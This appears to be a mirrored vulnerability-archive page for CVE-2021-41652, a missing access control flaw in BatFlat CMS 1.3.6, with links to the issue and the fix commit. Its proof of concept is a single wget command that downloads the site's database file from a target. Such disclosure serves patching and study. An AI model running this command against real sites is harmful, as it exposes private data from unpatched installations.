CVE-2021-41652 PoC — BatFlat CMS 安全漏洞

来源

https://github.com/deathflash1411/cve-2021-41652

关联漏洞

标题:BatFlat CMS 安全漏洞 (CVE-2021-41652)
Description:Paweł Klockiewicz Batflat CMS是 Paweł Klockiewicz开源的一个应用软件。提供一个CMS网站功能。 BatFlat CMS 存在安全漏洞，该漏洞允许攻击者可利用该漏洞转储整个数据库。

Description

Missing Access Control in BatFlat CMS 1.3.6

介绍

# CVE-2021-41652

**Description:** Missing Access Control in BatFlat CMS 1.3.6

**Vulnerable App:** [Download](https://github.com/sruupl/batflat/archive/master.zip) (reset to commit `0c9511fb342fbdd17fd0d1d0cccafc8ae43b6189`)

**Github Issue:** [https://github.com/sruupl/batflat/issues/113](https://github.com/sruupl/batflat/issues/113)

**Fixed Commit:** [9211d84406d63c575b079619137aff74b67cd344](https://github.com/sruupl/batflat/commit/9211d84406d63c575b079619137aff74b67cd344)

**Proof Of Concept:** `wget https://<target-ip>/inc/data/database.sdb`

文件快照


 [4.0K]  /data/pocs/80022e296ba70d37f08e2af0e335737f384a3334
└── [ 554]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮件到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对 POC 代码进行快照，为了长期维护，请考虑为本地 POC 付费/捐赠，感谢您的支持。

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2021-41652 PoC — BatFlat CMS 安全漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！